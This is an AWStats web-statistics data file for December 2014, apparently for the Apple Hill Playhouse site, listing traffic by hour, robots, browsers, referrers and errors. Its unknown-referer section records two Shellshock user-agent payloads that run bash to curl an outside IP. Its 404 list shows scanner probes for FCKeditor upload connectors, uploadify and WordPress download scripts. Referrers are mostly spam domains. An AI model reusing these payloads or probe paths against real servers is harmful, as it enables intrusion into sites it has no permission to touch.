AWSTATS DATA FILE 6.7 (build 1.892)
# If you remove this file, all statistics for date 201412 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1864                
POS_TIME 2537                
POS_VISITOR 28376               
POS_DAY 81714               
POS_DOMAIN 3514                
POS_LOGIN 3749                
POS_ROBOT 3904                
POS_WORMS 5110                
POS_EMAILSENDER 5241                
POS_EMAILRECEIVER 5384                
POS_SESSION 82644               
POS_SIDER 82856               
POS_FILETYPES 5519                
POS_OS 5739                
POS_BROWSER 5949                
POS_SCREENSIZE 6869                
POS_UNKNOWNREFERER 6943                
POS_UNKNOWNREFERERBROWSER 9706                
POS_ORIGIN 10787               
POS_SEREFERRALS 10937               
POS_PAGEREFS 11180               
POS_SEARCHWORDS 15518               
POS_KEYWORDS 16233               
POS_MISC 2200                
POS_ERRORS 16650               
POS_CLUSTER 3605                
POS_SIDER_404 16786               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20150101000039 1 0 15969094812064
FirstTime 20141201002529
LastTime 20141231234325
LastUpdate 20150102011359 1 0 0 0 0
TotalVisits 1513                
TotalUnique 1173                
MonthHostsKnown 0                   
MonthHostsUnknown 1409                
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 90 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 145 559 11539261 173 219 7429858
1 36 228 5761502 199 232 4136231
2 42 251 6115639 192 249 5331654
3 54 319 7416769 211 316 3547855
4 101 351 8276979 192 268 8274951
5 78 190 3919634 224 308 4972894
6 53 209 4910184 208 233 6904932
7 98 467 10329563 153 181 2078727
8 95 896 21012183 278 329 7085041
9 175 1311 29529964 194 279 4716455
10 167 1106 24497643 267 342 5811377
11 189 1031 22096042 175 269 4578782
12 136 1132 29074787 240 301 8443108
13 195 1217 28012587 230 281 8200397
14 210 1266 26818094 202 268 4023797
15 120 908 19210428 148 200 3878002
16 152 898 20153785 207 280 3586462
17 118 1016 23679104 212 289 4870155
18 143 1031 26654576 128 182 3760199
19 144 924 20729631 209 266 8811253
20 267 1308 27197643 205 277 3824838
21 153 974 23559305 271 313 7506904
22 139 988 20554733 322 408 3841112
23 198 950 20546804 172 228 3810045
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 3208 19530 441596840
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 29
\wbot[\/\-] 2236 65100586 20141231230131 181
googlebot 1226 19186521 20141231234505 91
baiduspider 472 14393458 20141231234616 8
mj12bot 272 5390426 20141231005438 111
robot 266 3349523 20141231202115 70
slurp 237 7917565 20141231234218 34
spider 167 2121037 20141231202413 64
crawl 167 2155052 20141231082534 14
java 141 3625458 20141230124515 2
unknown 80 1975 20141231072442 80
exabot 37 76437 20141231233224 17
ia_archiver 3 41012 20141231204504 1
mojeekbot 43 535924 20141231105224 20
seznambot 6 154166 20141215191627 3
xenu\slink\ssleuth 9 375224 20141222035202 0
phantom 31 433489 20141230223009 0
checkbot 4 330324 20141211154819 0
python 15 415363 20141231082534 5
heritrix 2 87049 20141227103540 0
titan 2 40014 20141227162745 0
surveybot 8 174198 20141219091948 4
archive\.org_bot 52 433274 20141231200547 28
webfilter 11 235029 20141227131644 4
tarantula 2 87049 20141223210451 0
cfnetwork 1 8148 20141215234234 0
yandex 65 768206 20141231083038 39
msnbot\-media 6 59742 20141212021535 3
w3c_validator 1 20007 20141218163134 0
nutch 18 462498 20141230212831 9
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 8
css 5029 17259121 0 0
png 748 18353991 0 0
html 3080 105918341 0 0
jpg 7313 186915304 0 0
js 2861 80453170 0 0
pdf 128 26200056 0 0
jpeg 105 6039800 0 0
gif 266 457057 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 16
winxp 1089
winlong 621
unix 105
winnt 9450
win2000 30
linuxubuntu 82
win98 9
linux 2107
macosx 5356
winme 7
win16 3
win95 13
wince 3
win2003 58
linuxdebian 1
Unknown 596
END_OS

# Browser ID - Hits
BEGIN_BROWSER 63
msie6.0 509
firefox28.0 17
webcapture 3
firefox5.0 4
firefox20.0 2
firefox3.6 1
firefox3.0.1 41
firefox1.0.2 1
firefox4.0 10
firefox18.0 4
curl 3
firefox34.0 624
msie3.02 3
firefox3.5.3 1
firefox3.6.15 44
firefox31.0 8
firefox2.0.0.13 1
msie8.0 650
netscape4.76 3
firefox2.0.0.14 1
firefox13.0.1 1
firefox6.0.2 4
netscape3.0 3
msie7.0 99
firefox3.5.8 4
firefox23.0 2
msie2.0 10
wget 1
msie5.0 5
msie9.0 683
Unknown 191
firefox11.0 4
netscape 1
firefox32.0 13
firefox17.0 29
opera 131
firefox21.0 22
firefox29.0 15
firefox3.5.2 2
msie5.5 12
firefox7.0.1 3
firefox12.0 1
netscape4.79 3
firefox2.0.0.11 2
nokia 40
netscape0.6 3
firefox33.0 332
firefox25.0 15
mozilla 2365
netscape5.0 22
firefox22.0 37
firefox3.0.6 1
firefox14.0.1 28
msie10.0 323
firefox6.0 69
netscape4.0 9
firefox3.6.3 78
msie 13
firefox3.5 1
firefox8.0.1 1
safari 13012
firefox15.0.1 9
firefox3.6.13 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 43
Mozilla/5.0_(compatible;_DuckDuckGo-Favicons-Bot/1.0;__http://duckduckgo.com) 20141231214030
Mechanize/2.7.3_Ruby/2.1.2p95_(http://github.com/sparklemotion/mechanize/) 20141216140751
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=applehillplayhouse.org/' 20141213123846
WebIndex 20141222223229
Crowsnest/0.5_(_http://www.crowsnest.tv/) 20141215192204
Mozilla/4.0_(compatible;_Synapse) 20141221132750
ltx71_-_(http://ltx71.com/) 20141219055616
Mozilla/4.0_(compatible;_Blog_Search;) 20141214042241
WFilter_Live_Category 20141230210422
Wotbox/2.01_(_http://www.wotbox.com/bot/) 20141208140610
Mozilla 20141205122122
Mozilla/3.0_(compatible;_WebCapture_2.0;_Auto;_Windows) 20141221162127
PHP/5.3.28 20141223123943
Mozilla/4.0 20141214055055
getrequest/1.0_(_http://www.getrequest.net/) 20141219113531
YahooCacheSystem 20141231233428
Mozilla/5.0_(compatible;_pmoz.info_ODP_link_checker;__http://pmoz.info/doc/botinfo.htm) 20141227110947
Mozilla/5.0_(Windows_Phone_8.1;_ARM;_Trident/7.0;_Touch;_rv:11.0;_IEMobile/11.0;_NOKIA;_Lumia_521)_like_Gecko 20141213083640
Mozilla/5.0_(Android;_Mobile;_rv:34.0)_Gecko/34.0_Firefox/34.0 20141227131120
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141231143251
Mozilla/5.0_(BB10;_Kbd)_AppleWebKit/537.10__(KHTML,_like_Gecko)_Version/10.1.0.2121_Mobile_Safari/537.10_ 20141217134053
cuwhois/1.0_(_http://www.cuwhois.com/) 20141215085953
Curl/PHP_5.4.32_(http://github.com/shuber/curl) 20141206024647
NerdyBot 20141231111421
Mozilla/5.0_(compatible;_SearchmetricsBot;_http://www.searchmetrics.com/en/searchmetrics-bot/) 20141227205036
Mozilla/5.0_(compatible;_MSIE_or_Firefox_mutant;_not_on_Windows_server;)_Daumoa/4.0 20141214235852
visionutils/0.2 20141228221801
\ 20141212032503
Mozilla/5.0_(compatible;_coccoc/1.0;__http://help.coccoc.com/) 20141210134003
Mozilla/5.0_(compatible;_MSIE_9.0;_Windows_Phone_OS_7.5;_Trident/5.0;_IEMobile/9.0;_NOKIA;_Lumia_900) 20141203003506
Mozilla/5.0_(compatible;_MSIE_or_Firefox_mutant;_not_on_Windows_server;___http://tab.search.daum.net/aboutWebSearch.html)_Daumoa/3.0 20141229093323
- 20141230222510
Mozilla/0.6_Beta_(Windows) 20141206095507
Pinterest/0.2_(_http://www.pinterest.com/) 20141206131119
Mozilla/5.0_(compatible;_Add_Catalog/2.1;) 20141229033902
FindTheBest.com-URL-Validator 20141208070312
dBpoweramp 20141210035344
Microsoft_Office_Protocol_Discovery 20141220200426
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=applehillplayhouse.net/' 20141216092309
Website_Explorer/0.9.9.9 20141228051540
Mozilla/5.0_(compatible;_Dow_Jones_Searchbot) 20141230001344
Mozilla/4.0_(compatible;) 20141230045255
A6-Indexer 20141211112957
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 22
\ 20141212032503
Mechanize/2.7.3_Ruby/2.1.2p95_(http://github.com/sparklemotion/mechanize/) 20141216140751
visionutils/0.2 20141228221801
WebIndex 20141222223229
- 20141230222510
Crowsnest/0.5_(_http://www.crowsnest.tv/) 20141215192204
Pinterest/0.2_(_http://www.pinterest.com/) 20141206131119
ltx71_-_(http://ltx71.com/) 20141219055616
FindTheBest.com-URL-Validator 20141208070312
dBpoweramp 20141210035344
WFilter_Live_Category 20141230210422
Wotbox/2.01_(_http://www.wotbox.com/bot/) 20141208140610
PHP/5.3.28 20141223123943
AndroidDownloadManager/4.4.2_(Linux;_U;_Android_4.4.2;_SCH-R970X_Build/KOT49H) 20141210053008
Microsoft_Office_Protocol_Discovery 20141220200426
getrequest/1.0_(_http://www.getrequest.net/) 20141219113531
YahooCacheSystem 20141231233428
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141231143251
Website_Explorer/0.9.9.9 20141228051540
cuwhois/1.0_(_http://www.cuwhois.com/) 20141215085953
NerdyBot 20141231111421
A6-Indexer 20141211112957
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 1208 1667
From1 3 3
From2 355 530
From3 682 776
From4 960 16554
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 9
google 272 446
dmoz 1 1
search 21 22
baidu 14 14
live 1 1
aol 2 2
yandex 14 14
ask 1 1
yahoo 29 29
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 110
http://semalt.semalt.com/crawler.php 117 117
http://buttons-for-website.com 72 72
http://www.bing.com/search 31 31
http://doska-vsem.ru 27 27
http://www.artparquet.ru 27 27
http://chimiver.info 24 24
http://make-money-online.7makemoneyonline.com/money.php 20 20
http://amoremio.by 12 12
http://mailpass.in 12 12
http://amaviq.wordpress.com 12 12
http://www.westmorelandheritage.org/cultural-attractions/theatres/ 2 2
http://sex-shop-internet.ru 1 1
http://mygadget.tk/tag/apple-hill 0 1
http://www.carnegielibrary.org/research/film/theater/childrens.html 11 11
http://www.pghcitypaper.com/pittsburgh/rabbit-hole/Content 1 1
http://www.swpenna.com/westmoreland-county-pa.htm 8 8
http://www.retaillink.engagedrx.com/jt/ 0 2
http://www.tehngr.ru 9 9
http://www.kamchatkabear.ru 6 6
http://www.pghcitypaper.com/pittsburgh/sweet-charity/Content 1 1
http://www.post-gazette.com/ae/theater-dance/2014/09/11/Fall-Arts-Preview-Plays-and-musicals/stories/201409110128 1 1
http://www.yellowpages.com/delmont-pa/mip/apple-hill-playhouse-8254576 2 2
http://promo-kodi.ru 3 3
http://www.adventureparkcostarica.com/en/tour-packages.html 1 1
http://www.narugka.ru 3 3
http://abajurlight.ru 3 3
http://webcache.googleusercontent.com/search 0 1
http://nacap.ru 3 3
http://www.a-parusa.ru 6 6
https://www.bing.com/search 1 25
http://serialsway.ucoz.ru 6 6
http://www.pghcitypaper.com/pittsburgh/apple-hill-playhouse/Location 1 1
http://studreferat.org 3 3
https://m.facebook.com 1 1
http://www.fortiswatches.com 3 3
http://pittsburgh.about.com/od/theater/ 5 5
http://flowersun.msk.ru 3 3
http://volkswagen.7zap.com 9 9
http://lm.facebook.com/l.php 1 1
http://www.co.westmoreland.pa.us/index.aspx 3 3
http://myfavoritebag.ru 3 3
http://remont-comp-pomosh.ru 3 3
https://seomon.com/domain/applehillplayhouse.org/ 1 1
http://www.altoonacommunitytheatre.com/about-us/other-stageslinks/ 1 1
http://pro-vk.info 3 3
http://musicaltheatreresource.blogspot.com/search 0 1
http://mywbs.com/profile.php 1 1
http://jointpoint.org 3 3
http://www.intim-art.ru 3 3
http://www.co.westmoreland.pa.us/Common/Modules/LeavingSite/Dialog.aspx 1 1
http://banan.tv 3 3
http://statuses.su 3 3
http://www.carnegielibrary.org/research/film/theater/companies.html 8 8
http://7zap.com 6 6
http://prigatour.ru 3 3
http://labplus.ru 6 6
http://www.local.com/business/details/delmont-pa/apple-hill-playhouse-51648208/ 1 1
http://www.bing.com/cr 1 1
http://alievy.com.ua 6 6
http://1kino.com 6 6
http://www.zoominfo.com/p/Jen-James/1248550746 1 1
http://otdih-na-more.ru 3 3
http://www.pavisitorsnetwork.com/cgi-bin/page3.cgi 1 1
http://www.inwestmoreland.com/wclocalinfo/art.aspx 10 10
http://belmontridgeapts.com/neighborhood-info 1 1
http://xlolitka.com 3 3
https://www.facebook.com 2 2
http://www.detsky.ru/detsad-mebel/ 3 3
http://csanty-online.ru 3 3
http://ehose-store.com 3 3
http://kupitmishku.ru 3 3
http://www.swpenna.com/things_to_do_in_pittsburgh.asp 3 3
http://sexhd.tv 3 3
http://w7s.ru 3 3
http://orgbase.biz 6 6
http://www.funpennsylvania.com/category/childrens-theater-in-pa/ 3 3
http://pittsburgh.about.com/gi/dynamic/offsite.htm 8 8
http://prodvigator.ua/keywords/index 1 11
http://onlinebooksclub.com 2 2
http://www.gostinici-moskvi.ru 3 3
http://bluerobot.info/info/fryrokitirobuha 1 1
http://www.burenieburenie.ru 3 3
http://l.facebook.com/l.php 8 8
http://www.yellowpages.com/search 1 1
http://5.79.65.196 1 1
http://managest.ru 3 3
http://iqfood.ru 3 3
http://cvety24.by 3 3
http://farmville-2.ru 3 3
http://brutforyou.blogspot.com 12 12
http://xudeem-pravilno.ru 6 6
http://humaspoldametrojaya.blogspot.com 1 1
http://sapio.by 3 3
http://blogos.kz 6 6
http://lauramfergus.wix.com/pittsburghactors 1 1
http://www.pghcitypaper.com/pittsburgh/the-kitchen-witches/Event 1 1
http://dosug-lux.ru 3 3
http://www.odeialo.ru 3 3
http://www.webwiki.com/www.applehillplayhouse.org 1 1
http://lolpost.ru 6 6
http://audi.7zap.com 9 9
http://madridspania2014.blogspot.com 1 1
http://1serial.tv 3 3
http://www.bing.com/images/search 0 9
http://taximytishi.ru 3 3
http://m.facebook.com 9 9
http://liderpak.ru 6 6
http://pittsburgh.about.com/od/culture_kids/ 1 1
http://altezza.travel 3 3
http://podiumplayers.org/auditions/ 0 46
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 19
apple+hill+playhouse 11
applehillplayhouse.org 9
betac 8
applehillplayhouse.net 3
applehill+playhouse 2
%d0%ba%d0%be%d1%84%d0%b5+%d1%8d%d0%bf%d0%bf%d0%bb+%d1%85%d0%b8%d0%bb%d0%bb 2
apple+hill+playhouse+schedule+2015 2
johnny+appleseed+playhouse+delmont+pa 1
johnny+appleseed 1
applehillplayouse.com 1
apple+hill+dormont 1
apple+hill+playhouse+schedule 1
apple+theater 1
childrens+theater+greensburg+pa 1
apple+playhouse 1
new+years+eve+apple+hill+playhouse+delmont+pa 1
apple+hill+dinner+theater 1
dinner+theater+westmoreland+county+pa 1
delmont+apple+theater 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 27
apple 20
playhouse 19
hill 17
applehillplayhouse.org 9
betac 8
theater 5
pa 4
delmont 3
schedule 3
applehillplayhouse.net 3
childrens 1
applehill 2
applehillplayouse.com 1
years 1
johnny 2
new 1
2015 2
%d0%ba%d0%be%d1%84%d0%b5 2
%d1%8d%d0%bf%d0%bf%d0%bb 2
westmoreland 1
appleseed 2
eve 1
dormont 1
%d1%85%d0%b8%d0%bb%d0%bb 2
county 1
dinner 2
greensburg 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
403 26 7889
206 65 990680
405 3 686
404 843 446775
301 1 245
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 286
/wordpress/ 1 -
/admin.php 18 -
//user/ 1 -
/includes/fckeditor/editor/filemanager/connectors/php/connector.php 1 -
/lib/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/lib/uploadify/uploadify.swf
/board/ 1 -
/phpcms/ 1 -
/shopex/ 1 -
/ckeditor/ckfinder/core/connector/php/connector.php 1 -
/typecho/ 1 -
/fckeditor/fckeditor.js 1 -
/common/common.js 1 -
/fckeditor/editor/filemanager/upload/aspx/upload.aspx 1 -
/xmlrpc.php 1 -
/fckeditor/editor/filemanager/connectors/php/upload.php 1 -
/fckeditor/editor/filemanager/browser/default/connectors/test.html 1 http://applehillplayhouse.org/fckeditor/editor/filemanager/browser/default/connectors/test.html
/member/space/company/info.txt 1 -
/nyet.gif 2 -
/includes/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/includes/uploadify/uploadify.swf
/test/custom-error-page-test 1 -
/ckeditor/ckfinder/core/connector/aspx/connector.aspx 1 -
/FCKeditor/editor/filemanager/connectors/test.html 1 -
/photography-blog/wp-login.php 1 -
/administrator/manifests/files/joomla.xml 1 -
/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx 1 -
/rainbow/portal/alias__Rainbow/lang__en-US/tabID__3344/DesktopDefault.aspx 1 -
/includes/fckeditor/editor/filemanager/connectors/php/upload.php 1 -
/checksite/custom-error-page-test 2 -
//wp-login.php 1 -
/cgi-sys/entropysearch.cgi 2 -
/page28.html 6 -
/rainbow/_Rainbow/images/emperor-new-clothes-1.jpg 1 -
/wp-content/themes/yakimabait/download.php 2 -
/administrator/ 12 -
/iwebshop/ 1 -
/apple-touch-icon-152x152-precomposed.png 2 -
/docs.css 1 -
/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php 2 -
/admin/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/admin/uploadify/uploadify.swf
/wp-login.php 17 -
/admin/inc/xml.xslt 1 -
/inc/rsd.php 1 -
/scripts/'%20+http+%20action%20+' 193 http://www.applehillplayhouse.org/scripts/user.js
/store/ 9 -
/image/wp-login.php 1 -
/cgi-bin/php 1 -
/journal/wp-login.php 1 -
/shop/ 9 -
/data 1 -
/images/scholarship_application_2011.pdf 1 -
/scripts/'+src+' 7 -
/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php 2 -
/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp 1 -
/images/ahp_2010_jact_ticket_order_ 3 -
/license.txt 1 -
/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp 1 -
/verycms/ 1 -
/includes/fckeditor/editor/filemanager/connectors/asp/connector.asp 1 -
/cmseasy/ 1 -
/FCK/editor/filemanager/browser/default/connectors/php/connector.php 3 -
/history.txt 1 -
//page23.html 1 -
/fck/editor/filemanager/browser/default/connectors/php/connector.php 3 -
/favicon.gif 4 -
/wp-content/themes/Newspapertimes_1/download.php 2 -
/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx 1 -
/plus/sitemap.html 1 -
//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js 2 http://www.applehillplayhouse.org
/readme.html 1 -
/system/language/zh-cn.xml 1 -
/newblog/wp-login.php 1 -
/includes/general.js 1 -
/dedecms/ 1 -
/system/skins/default/system.login.htm 1 -
/editor/js/fckeditorcode_ie.js 1 -
/public/js/ips.board.js 1 -
/cgi-bin/main.cgi 2 -
/%20 4 -
/archive/archive.css 1 -
/admin/fckeditor/editor/filemanager/upload/php/upload.php 1 -
/forum/ 9 -
/fckeditor/editor/filemanager/upload/php/upload.php 1 -
/wordpress/wp-login.php 3 -
/includes/fckeditor/editor/filemanager/upload/asp/upload.asp 1 -
/images/2002%20JACT%20graphics/Poohskate.gif 1 -
/wp-admin/ 4 -
/dvbbs/ 1 -
/zcms/ 1 -
/images/wp-login.php 1 -
/wordpress 1 http://applehillplayhouse.net/wordpress
/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/images/2013_ 1 -
/guest-blog/wp-login.php 1 -
/FCK/editor/filemanager/connectors/php/connector.php 3 -
/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php 3 -
/fckeditor/editor/filemanager/connectors/aspx/upload.aspx 1 -
//code.jquery.com/jquery-1.11.1.min.js 5 http://applehillplayhouse.net//code.jquery.com/jquery-1.11.1.min.js
/template/home.htm 1 -
/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php 4 -
/plus/rssmap.html 1 -
/wp-content/plugins/plugin-newsletter/preview.php 2 -
//page27.html 1 -
/fckeditor/editor/filemanager/connectors/asp/connector.asp 1 -
/administrator 1 www.applehillplayhouse.org/administrator
/editor/editor/filemanager/browser/default/connectors/test.html 3 -
/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/uploadify/uploadify.swf
/docs/ 1 -
/leadbbs/ 1 -
/images/2011_ 1 -
/test/wp-admin/ 4 -
/Administrator/fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/admin/Fckeditor/editor/filemanager/browser/default/connectors/test.html 1 -
/apple-touch-icon.png 20 -
/admin/fckeditor/editor/filemanager/connectors/php/upload.php 1 -
/admin/FCKeditor/editor/filemanager/connectors/php/connector.php 3 -
/cgi-bin/php4 1 -
/ckeditor/ckeditor.js 1 -
/blog/ 6 -
/wp/ 1 -
/rainbow/portal/alias__Rainbow/lang__en-US/tabID__3356/DesktopDefault.aspx 1 -
/digg.php 1 -
/archiver 2 -
/cgi-bin/php-cgi 1 -
/writingblog/wp-login.php 1 -
/inc/Templates/rss.xslt 1 -
/apple-touch-icon-precomposed.png 15 -
/includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx 1 -
/6kbb/ 1 -
/wp-content/plugins/wp-filemanager/incl/libfile.php 2 -
/includes/fckeditor/editor/filemanager/upload/php/upload.php 1 -
/inc/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/inc/uploadify/uploadify.swf
/admin 1 -
/oscommerce/ 1 -
/sitemap_index.xml 4 -
/ror.xml 1 -
/wp 1 http://applehillplayhouse.net/wp
/extern.php 1 -
/rainbow 9 -
/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp 1 -
/tools/rss.aspx 1 -
/fckeditor/editor/js/fckeditorcode_ie.js 2 -
/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp 1 -
/stylesheet.css 1 -
/apple-touch-icon-57x57.png 1 -
/feed.asp 1 -
/admin/fckeditor/editor/filemanager/connectors/php/connector.php 4 -
/drupal/ 1 -
//page28.html 1 -
/images/adulttheatreticketorderform 3 -
/blogs/wp-login.php 1 -
/magento/ 1 -
/fckeditor/editor/filemanager/connectors/php/connector.php 4 -
/blog 1 http://applehillplayhouse.net/blog
/editor/editor/filemanager/connectors/test.html 1 -
/images/pngbehavior.htc 1 http://applehillplayhouse.org/scripts/icwebsiteelement.css
/FCK/fckeditor.js 1 -
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php 2 -
/includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp 1 -
//administrator/index.php 1 -
/wp-content 1 -
/joomla/ 1 -
//index.php 2 -
/magmi/web/magmi.php 1 -
/wp-content/plugins/dukapress/lib/dp_image.php 2 -
/+++++++++++++++++++++++++++++++++++++++++++++++Result:+no+post+sending+forms+are+found 2 http://www.applehillplayhouse.org/+++++++++++++++++++++++++++++++++++++++++++++++Result:+no+post+sending+forms+are+found
/rainbow/ 18 -
/FCKeditor/editor/filemanager/connectors/php/connector.php 3 -
/js/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/js/uploadify/uploadify.swf
/apple-touch-icon-152x152.png 1 -
/dinnertheater/dinnermenu.htmlCachedSimilar 15 -
/opencart/ 1 -
/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php 2 -
/ecshop/ 1 -
/wp-content/plugins/pica-photo-gallery/picadownload.php 2 -
/Administrator/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html 2 -
/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx 1 -
/wp-content/themes/tess/download.php 2 -
/jxcms/ 1 -
/wp/wp-admin/ 3 -
/page23.html 6 -
/admin/fckeditor/editor/filemanager/upload/asp/upload.asp 1 -
/plugins/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/plugins/uploadify/uploadify.swf
/wordpressnew/wp-login.php 1 -
/wp-login/ 2 -
/data/admin/ver.txt 1 -
/Apprenticeships 1 -
/wp-admin/admin-ajax.php 7 -
/wp-content/themes/ypo-theme/download.php 2 -
/Fckeditor/editor/filemanager/browser/default/connectors/test.html 3 -
/cart/ 1 -
/skin/frontend/default/modern/css/styles.css 1 -
/metinfo/ 1 -
/editor/editor/filemanager/browser/default/connectors/uploadtest.html 2 -
/fckeditor/editor/filemanager/upload/asp/upload.asp 1 -
/urllist.txt 1 -
/kesion/ 1 -
/mall/ 9 -
/weblog/ 5 -
/images/order_form_jact_web_2014.pdf 2 http://www.applehillplayhouse.org/images/order_form_jact_web_2014.pdf
/cgi-bin/sys.cgi 2 -
/wp-content/themes/authentic/includes/download.php 2 -
/FCK/editor/js/fckeditorcode_ie.js 1 -
/shop7z/ 1 -
/administrator/index.php 4 -
/kingcms/ 1 -
/includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx 1 -
/empirecms/ 1 -
/install 1 -
/wordpress/wp-admin/ 3 -
/wp-cron.php 1 -
/fckeditor.js 1 -
/fckeditor/license.txt 1 -
/bitrix/admin/ 1 -
/fckeditor/fckconfig.js 1 -
/cms/uploadify/uploadify.swf 1 http://www.applehillplayhouse.org/cms/uploadify/uploadify.swf
/sitemap.xml 12 -
/admin/FCKeditor/editor/filemanager/connectors/test.html 1 -
/user 6 -
/images/camps_flyer_2013.pdf 1 -
/aspcms/ 1 -
/licence.txt 1 -
/changelog.txt 1 -
/inc/playerKinds.xml 1 -
/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php 1 -
/multichat.jar 2 -
/fluxbb/ 1 -
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php 4 -
/browserconfig.xml 11 -
/images/2011_ahp_jact_ticket_order_ 3 -
/FCKeditor/editor/filemanager/connectors/uploadtest.html 2 -
//page29.html 1 -
/fck/editor/filemanager/connectors/php/connector.php 3 -
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx 1 -
/phpmyadmin/ 1 -
/list.php 1 -
/kcfinder/browse.php 1 -
/phpwind/ 1 -
/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx 1 -
/api/api_user.xml 1 -
/wp-content/themes/jarida/download.php 2 -
/apple-touch-icon-120x120.png 2 -
/wp-content/plugins/filedownload/download.php/ 2 -
/images/order_form_jact_web_2014.pdf%22%7C%22--%22%7C%22--%22%7C%22--%22%7C%22--%22%7C%22--%22 1 http://www.applehillplayhouse.org/images/order_form_jact_web_2014.pdf\"|\"--\"|\"--\"|\"--\"|\"--\"|\"--\"
/phpbb/ 1 -
/blog/wp-admin/ 3 -
/https://www.google.com/calendar/embed 2 -
/apple-touch-icon-120x120-precomposed.png 2 -
/blog/wp-login.php 2 -
/includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx 1 -
/bbsmax/ 1 -
/oecms/ 1 -
/discuz/ 2 -
/site/wp-login.php 2 -
/cgi-bin/php.cgi 1 -
/rss.php 2 -
/includes/fckeditor/editor/filemanager/connectors/asp/upload.asp 1 -
/wp-content/themes/urbancity/lib/scripts/download.php 2 -
/old/wp-admin/ 3 -
/cgi-bin/php5 1 -
/wp-content/themes/corporate_works/downloader.php 2 -
/images/ahp_jact_ticket_order_ 3 -
/ckeditor/ckfinder/core/connector/asp/connector.asp 1 -
/maxcms/ 1 -
